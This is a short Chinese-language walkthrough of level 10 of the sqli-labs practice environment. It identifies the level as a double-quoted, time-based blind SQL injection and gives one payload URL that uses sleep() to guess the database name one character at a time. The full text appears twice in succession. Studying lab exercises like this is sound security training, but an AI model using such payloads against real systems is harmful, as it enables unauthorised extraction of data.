Less-10
查看源代码:
由此可见,这里是一个基于时间注入的双引号注入。
猜测数据库:
http://192.168.11.136/sqli-labs/Less-10?id=1" and if (ascii(substr(database(),1,1))=115),1,sleep(5)) --+
之后的猜测表名、字段名、字段值与上一关的基本相同,唯一不同之处就是“ ' ”与“ ””。这里就不再多复述了。
查看源代码:
由此可见,这里是一个基于时间注入的双引号注入。
猜测数据库:
http://192.168.11.136/sqli-labs/Less-10?id=1" and if (ascii(substr(database(),1,1))=115),1,sleep(5)) --+
之后的猜测表名、字段名、字段值与上一关的基本相同,唯一不同之处就是“ ' ”与“ ””。这里就不再多复述了。